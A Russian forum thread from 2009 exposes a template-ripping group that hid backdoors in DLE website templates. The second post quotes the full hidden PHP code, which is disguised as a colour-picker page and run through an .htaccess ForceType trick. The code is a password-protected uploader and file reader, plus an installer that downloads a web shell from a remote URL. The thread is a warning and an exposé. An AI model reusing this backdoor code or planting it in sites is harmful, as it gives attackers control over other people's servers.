Black - RUnet Team

Тема в разделе "Black list", создана пользователем +VAMPIR+, 21 дек 2009.

Статус темы:
Закрыта.
  1. +VAMPIR+

    +VAMPIR+ Master

    Регистр.:
    13 апр 2006
    Сообщения:
    533
    Симпатии:
    616
    Всем привет и всех с наступающим.
    Итак что хотелось сказать по поводу барыг, крыс, кидал и.т.д…
    Недавно столкнулся с ребятами которые занимаются этими вещами… что самое плохое они находятся и в клубе и модераторы…
    Все мы знает RUnet Team группу по созданию Rip’ов шаблонов для DLE.
    Они конечно отлично рипают и немного добавляют своего года как например:

    PHP:
    Order Deny,Allow
    Allow from all
    <FilesMatch "^(bb)\.html$">
      
    ForceType application/x-httpd-php
    </FilesMatch>
    и потом выполняется файл bb.html (который закоден)

    сам шабик лежит тут http://www.nulled.ws/showthread.php?t=159802
    дальше специльно рипали для меня
    http://www.nulled.ws/showthread.php?t=159822
    за, что сначало был очень благодарен пока сегдоня не обнаружил шеллы на сайте и файлик который находился в рипнутом шаблоне color.html
    и файл .htaccess с добавлением :

    PHP:
    Order Deny,Allow
    Allow from all
    <FilesMatch "^(color)\.html$">
      
    ForceType application/x-httpd-php
    </FilesMatch>
    Я одного не понимаю для чего это делается ? Траф погонять , много наработали ?
    Так же сюда же http://www.nulled.ws/showthread.php?t=152870&highlight=korner
    Вообще кто скачал их шаблоны проверяйте на шеллы, на подозрительные файлы, вот такие сейчас бывают люди.
    От себя ещё добавлю,CheburatoR-all вообще я такого от тебя не ожидал.
     
    kail.2009, fte, o_nix и 19 другим нравится это.
  2. Ser Frood

    Ser Frood Заблокирован

    Регистр.:
    12 дек 2006
    Сообщения:
    519
    Симпатии:
    384
    Собственно сама хрень с шабов:
    PHP:
    <?php
    if($_GET['upload']){
    session_start();
    if(isset(
    $_GET['a']) && $_GET['a']=='logout')
     unset(
    $_SESSION['auth']);

    if(isset(
    $_POST['pass'])){
     
    $users = array(
     
    'root' => md5(md5('uvCJlBF9eIcq9bEhUpg83baFcW9JKmqa'))
     );
     if(
    $users['root'] == md5(md5($_POST['pass']))){
      
    $_SESSION['auth'] = true;
     }
    }

    if(!isset(
    $_SESSION['auth']) || $_SESSION['auth'] != true){
    $hp=$_GET['hp'];
     echo <<<EOF
    <form method="POST">



    <link href="http://
    $hp/unload/style.css" rel="stylesheet" type="text/css" />

    <div class="login_php_01">
    <div class="login_php_02">
    <div class="login_php_03">
    <div class="login_php_04"><div style="padding:90px 0px 0px 40px">

        <span style="font:11px Verdana;">Password: </span><input name="pass" type="password" size="20">
        <input type="hidden" name="doing" value="login">
        <input type="submit" value="Auth" class="login_bottom" style="border:0px">

        </div></div>
    </div>
    </div>
    </div>

    </form>
    EOF;
    exit;
    }
    else



    if(
    $_GET['ups'])
    {
    echo
    "_get_ o_O";
    unlink ("spacer.gif");
    exit;    
    }
    $hp=$_GET['hp'];
    $dir=$_GET['dir'];
    $f = @fsockopen("$hp"80$x0c$x0d6); 
    if(!
    $f){echo 'Ебанутый Гамунгол'; }
    else{
     
    $x0e = @file("$dir");
     echo 
    implode('',$x0e); 
    }
    $adres $_POST['adres'];
    $get=$_SERVER['DOCUMENT_ROOT']."/".$adres;
    if(
    copy($HTTP_POST_FILES["lopd"]["tmp_name"],"$get".$HTTP_POST_FILES["lopd"]["name"])){
    $der "<span class='line'></span>Каталог для загрузки: <strong>";
    $test $_SERVER['HTTP_HOST']."/$adres"."<a href=http://".$_SERVER['HTTP_HOST']."/$adres".$HTTP_POST_FILES["lopd"]["name"]." target='_blank'>".$HTTP_POST_FILES["lopd"]["name"]."</a></strong>";
    echo <<<HTMLS
    <div style="position:absolute;top:0px;left:0px;width:100%;height:100%"><div style="padding-left:50%;padding-top:343px;">
    <div style="margin-left:-215px;width:425px;height:179px;">
    $der$test</div></div></div>
    HTMLS;

    else {echo(
    "");}
    }

    ?>


    <?
    if($_GET['install']){

    $dir=$_SERVER['DOCUMENT_ROOT']."/";//главный каталог
    $install=$_GET['install'];//какоу сод установить
    $file_in=$_GET['file'];//в какой файл
    $url=$_GET['url'];//url откуда грузить код
    $path=$_GET['path'];//в какую папку
    $path2_shell=$_GET['path2_shell'];//в какую папку


    if(chmod("$dir$path$file_in", 0666)){$chmod=true;}


    $types=array('conect','shell');//название двх файлов
    for($i = 0; $i < count($types); $i++) {

    $files = $url.'conect.txt';
    $newfile = $dir.$path.'conect.php';
    $files2 = $url.'shell.txt';
    $newfile2 = $dir.$path2_shell.'/shell.php';

    if (copy($files,$newfile)){$copy=true;}
    if (copy($files2,$newfile2)){$copy2=true;}

    }


    if($copy==true){
    $data=$install;
    $data = str_replace('\\\\','\\',$data);
    $data = str_replace('\\"','"',$data);
    $data = str_replace("\\'","'",$data);


    $log = $dir.$path.$file_in;
    $file = fopen ($log, "a+");

    // Добавляем данные в файл
    $str="$data\n";
    if(fputs ($file, $str)){$rec=true;}
    fclose($file);
    }


    if($chmod==true&&$rec==true&&$copy==true){echo"<!--ok-->";}
    else{
    if($chmod==false){echo"chmod_eror";}
    if($rec==false){echo"rec_eror";}
    if($copy==false){echo"copy_eror";}

    }

    }
    ?>


    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

    <html>
    <head>
        <title>Text Color</title>
        <script language="JavaScript" type="text/javascript">
        <!--
        function selectColor(color) {
            self.parent.setColor(color);
        }
        
        function InitColorPalette() {
            if (document.getElementsByTagName)
                var x = document.getElementsByTagName('TD');
            else if (document.all)
                var x = document.all.tags('TD');
            for (var i=0;i<x.length;i++) {
                x[i].onclick = click;
            }
        }
        
        function click() {
            selectColor(this.id);
        }
        //-->
        </script>
    </head>
    <body bgcolor="white" onLoad="InitColorPalette()" leftmargin="0" rightmargin="0" marginwidth="0" marginheight="0" topmargin="0" bottommargin="0">
    <table width="150" height="100" cellpadding="0" cellspacing="1" border="1" align="center">
        <tr>
            <td id="#FFFFFF" bgcolor="#FFFFFF" width="10" height="10"><img width="1" height="1"></td>
            <td id="#FFCCCC" bgcolor="#FFCCCC" width="10" height="10"><img width="1" height="1"></td>
            <td id="#FFCC99" bgcolor="#FFCC99" width="10" height="10"><img width="1" height="1"></td>
            <td id="#FFFF99" bgcolor="#FFFF99" width="10" height="10"><img width="1" height="1"></td>
            <td id="#FFFFCC" bgcolor="#FFFFCC" width="10" height="10"><img width="1" height="1"></td>
            <td id="#99FF99" bgcolor="#99FF99" width="10" height="10"><img width="1" height="1"></td>
            <td id="#99FFFF" bgcolor="#99FFFF" width="10" height="10"><img width="1" height="1"></td>
            <td id="#CCFFFF" bgcolor="#CCFFFF" width="10" height="10"><img width="1" height="1"></td>
            <td id="#CCCCFF" bgcolor="#CCCCFF" width="10" height="10"><img width="1" height="1"></td>
            <td id="#FFCCFF" bgcolor="#FFCCFF" width="10" height="10"><img width="1" height="1"></td>
        </tr>
        <tr>
            <td id="#CCCCCC" bgcolor="#CCCCCC" width="10" height="10"><img width="1" height="1"></td>
            <td id="#FF6666" bgcolor="#FF6666" width="10" height="10"><img width="1" height="1"></td>
            <td id="#FF9966" bgcolor="#FF9966" width="10" height="10"><img width="1" height="1"></td>
            <td id="#FFFF66" bgcolor="#FFFF66" width="10" height="10"><img width="1" height="1"></td>
            <td id="#FFFF33" bgcolor="#FFFF33" width="10" height="10"><img width="1" height="1"></td>
            <td id="#66FF99" bgcolor="#66FF99" width="10" height="10"><img width="1" height="1"></td>
            <td id="#33FFFF" bgcolor="#33FFFF" width="10" height="10"><img width="1" height="1"></td>
            <td id="#66FFFF" bgcolor="#66FFFF" width="10" height="10"><img width="1" height="1"></td>
            <td id="#9999FF" bgcolor="#9999FF" width="10" height="10"><img width="1" height="1"></td>
            <td id="#FF99FF" bgcolor="#FF99FF" width="10" height="10"><img width="1" height="1"></td>
        </tr>
        <tr>
            <td id="#C0C0C0" bgcolor="#C0C0C0" width="10" height="10"><img width="1" height="1"></td>
            <td id="#FF0000" bgcolor="#FF0000" width="10" height="10"><img width="1" height="1"></td>
            <td id="#FF9900" bgcolor="#FF9900" width="10" height="10"><img width="1" height="1"></td>
            <td id="#FFCC66" bgcolor="#FFCC66" width="10" height="10"><img width="1" height="1"></td>
            <td id="#FFFF00" bgcolor="#FFFF00" width="10" height="10"><img width="1" height="1"></td>
            <td id="#33FF33" bgcolor="#33FF33" width="10" height="10"><img width="1" height="1"></td>
            <td id="#66CCCC" bgcolor="#66CCCC" width="10" height="10"><img width="1" height="1"></td>
            <td id="#33CCFF" bgcolor="#33CCFF" width="10" height="10"><img width="1" height="1"></td>
            <td id="#6666CC" bgcolor="#6666CC" width="10" height="10"><img width="1" height="1"></td>
            <td id="#CC66CC" bgcolor="#CC66CC" width="10" height="10"><img width="1" height="1"></td>
        </tr>
        <tr>
            <td id="#999999" bgcolor="#999999" width="10" height="10"><img width="1" height="1"></td>
            <td id="#CC0000" bgcolor="#CC0000" width="10" height="10"><img width="1" height="1"></td>
            <td id="#FF6600" bgcolor="#FF6600" width="10" height="10"><img width="1" height="1"></td>
            <td id="#FFCC33" bgcolor="#FFCC33" width="10" height="10"><img width="1" height="1"></td>
            <td id="#FFCC00" bgcolor="#FFCC00" width="10" height="10"><img width="1" height="1"></td>
            <td id="#33CC00" bgcolor="#33CC00" width="10" height="10"><img width="1" height="1"></td>
            <td id="#00CCCC" bgcolor="#00CCCC" width="10" height="10"><img width="1" height="1"></td>
            <td id="#3366FF" bgcolor="#3366FF" width="10" height="10"><img width="1" height="1"></td>
            <td id="#6633FF" bgcolor="#6633FF" width="10" height="10"><img width="1" height="1"></td>
            <td id="#CC33CC" bgcolor="#CC33CC" width="10" height="10"><img width="1" height="1"></td>
        </tr>
        <tr>
            <td id="#666666" bgcolor="#666666" width="10" height="10"><img width="1" height="1"></td>
            <td id="#990000" bgcolor="#990000" width="10" height="10"><img width="1" height="1"></td>
            <td id="#CC6600" bgcolor="#CC6600" width="10" height="10"><img width="1" height="1"></td>
            <td id="#CC9933" bgcolor="#CC9933" width="10" height="10"><img width="1" height="1"></td>
            <td id="#999900" bgcolor="#999900" width="10" height="10"><img width="1" height="1"></td>
            <td id="#009900" bgcolor="#009900" width="10" height="10"><img width="1" height="1"></td>
            <td id="#339999" bgcolor="#339999" width="10" height="10"><img width="1" height="1"></td>
            <td id="#3333FF" bgcolor="#3333FF" width="10" height="10"><img width="1" height="1"></td>
            <td id="#6600CC" bgcolor="#6600CC" width="10" height="10"><img width="1" height="1"></td>
            <td id="#993399" bgcolor="#993399" width="10" height="10"><img width="1" height="1"></td>
        </tr>
        <tr>
            <td id="#333333" bgcolor="#333333" width="10" height="10"><img width="1" height="1"></td>
            <td id="#660000" bgcolor="#660000" width="10" height="10"><img width="1" height="1"></td>
            <td id="#993300" bgcolor="#993300" width="10" height="10"><img width="1" height="1"></td>
            <td id="#996633" bgcolor="#996633" width="10" height="10"><img width="1" height="1"></td>
            <td id="#666600" bgcolor="#666600" width="10" height="10"><img width="1" height="1"></td>
            <td id="#006600" bgcolor="#006600" width="10" height="10"><img width="1" height="1"></td>
            <td id="#336666" bgcolor="#336666" width="10" height="10"><img width="1" height="1"></td>
            <td id="#000099" bgcolor="#000099" width="10" height="10"><img width="1" height="1"></td>
            <td id="#333399" bgcolor="#333399" width="10" height="10"><img width="1" height="1"></td>
            <td id="#663366" bgcolor="#663366" width="10" height="10"><img width="1" height="1"></td>
        </tr>
        <tr>
            <td id="#000000" bgcolor="#000000" width="10" height="10"><img width="1" height="1"></td>
            <td id="#330000" bgcolor="#330000" width="10" height="10"><img width="1" height="1"></td>
            <td id="#663300" bgcolor="#663300" width="10" height="10"><img width="1" height="1"></td>
            <td id="#663333" bgcolor="#663333" width="10" height="10"><img width="1" height="1"></td>
            <td id="#333300" bgcolor="#333300" width="10" height="10"><img width="1" height="1"></td>
            <td id="#003300" bgcolor="#003300" width="10" height="10"><img width="1" height="1"></td>
            <td id="#003333" bgcolor="#003333" width="10" height="10"><img width="1" height="1"></td>
            <td id="#000066" bgcolor="#000066" width="10" height="10"><img width="1" height="1"></td>
            <td id="#330099" bgcolor="#330099" width="10" height="10"><img width="1" height="1"></td>
            <td id="#330033" bgcolor="#330033" width="10" height="10"><img width="1" height="1"></td>
        </tr>
    </table>
    </body>
    </html>
     
    Vfrcbv, dragonstyle, CheburatoR-all и ещё 1-му нравится это.
  3. masima

    masima

    Регистр.:
    9 мар 2007
    Сообщения:
    733
    Симпатии:
    1.338
    а потом десятки пишут что их сайты часто ломают :)
     
    dragonstyle нравится это.
  4. General Fizz

    General Fizz Боевой Генерал :)

    Регистр.:
    11 апр 2007
    Сообщения:
    753
    Симпатии:
    396
    dragonstyle нравится это.
  5. CheburatoR-all

    CheburatoR-all Гипножаба

    Регистр.:
    26 апр 2009
    Сообщения:
    295
    Симпатии:
    438
    :nezn: Так вот что неокс называет проверкой моих шаблонов. :-]:-] Сейчас повысовываю эту хрень их шабов. Я конечно знал про старый код о котором все знают, но мне собственно не чего не сообщили о "новом" коде. Однако меня насторожила постоянная проверка моих шаблонов. Короче писец. пздц просто. :mad:В общем думаю команда будет распущенна по крайней мере меня там не будет уже.

    :tcl: Я сам не ожидал. Что же, я больше не в runet team'e
     
    dragonstyle нравится это.
  6. Ramazan

    Ramazan пыщ-пыщ

    Регистр.:
    28 янв 2007
    Сообщения:
    471
    Симпатии:
    98
    CheburatoR-all, есть такая старая поговорка:
    "Я не я, попа не моя"
    Ну скажи мне как это всё происходит?
    Как ты не знаешь, что там?
    Т.е. ты рипнул, отдал там этому неокс'у, он запихнул этот код туда вернул тебе, а ты как был не вкурсе зачем ему это нужно так и оставался на протяжении всего времени?
    И вот насчёт повысовываю, зачем вообще туда это пихать?
     
    Budrin нравится это.
  7. lifediz

    lifediz Yii Framework developer

    Регистр.:
    7 июн 2008
    Сообщения:
    385
    Симпатии:
    507
    В бан всех, и не надо писать что незнал, надо было просить расшифрованный код, смотреть его, а потом уж юзать! Ты такой же участник как и они, убеждал всех что не вредоносный код...

    В баню, а то слишком много КсандерМаксимовых развелось!
     
    Budrin нравится это.
  8. CheburatoR-all

    CheburatoR-all Гипножаба

    Регистр.:
    26 апр 2009
    Сообщения:
    295
    Симпатии:
    438
    Собственно из моих шаблонов только тут http://www.nulled.ws/showthread.php?t=159802 этот код и еще в нескольких. И проверки происходили только несколько раз, я не чего и не заподозрил. Я неокса знаю достаточно давно и с самого начала до конца runet team я до конца не чего не знал. Особенно поразило, то что меня не посвятили в новые дела. Я уже сказал что шеллы это конкретный перебор и это послежило причиной моего ухода, а смысл мне там находится если меня даже не посвящают в содержимое моих рипов.
    Я утверждал про прошлый который в login'e сидел(Он И то что сейчас вообще разные вещи). Я не когда не одобрял такие виды взлома. Там (который прятался в логин) был код который запросы к сайту подовал (расшифровка чуть ли не везде лежит, можете лично убедится ), а тут 100% Вредоносный код :mad: Не знал я про этот не чего, а может и узнал был, но он попал только в 2 моих шаблона после проверки неоксом. Покажи где я утверждал что этот шелл не вредоносный??? Как написано выше, код стоит только в двух шаблонах которые проверял неокс.

    Считаете что я вру? Пожалуйста, баньте, но в команду runet team я не вернусь
     
  9. lifediz

    lifediz Yii Framework developer

    Регистр.:
    7 июн 2008
    Сообщения:
    385
    Симпатии:
    507
    Чебуратор, я говорю что ты писал где-то что это всего лишь палилка где шаблон ставят или что-то подобное (в суть темы я не вникал). Если тебя забанят, врятли уже когда-нибудь в команду возьмут.
     
  10. CheburatoR-all

    CheburatoR-all Гипножаба

    Регистр.:
    26 апр 2009
    Сообщения:
    295
    Симпатии:
    438
    Так я писал про это:
    http://truhan4ik.ru/index.php?newsid=4381
    А если сравнить с тем что в первом посте находится, совершенно разное. Про то что в первом посте я никогда не писал и не оправдывал. И говорю что это перебор. Я более не собираюсь выгораживать неокса и эту команду.

    В том что в шаблон попал шелл я тоже виноват т.к мог и проследить за лишним файлом. По этому и извиняюсь
    Я говорю про runet team, то что туда не вернусь
    Поговорил с lifediz'ом в аське :) Думаю он понял что я всегда что бы не случилось на стороне нулледа
     
Статус темы:
Закрыта.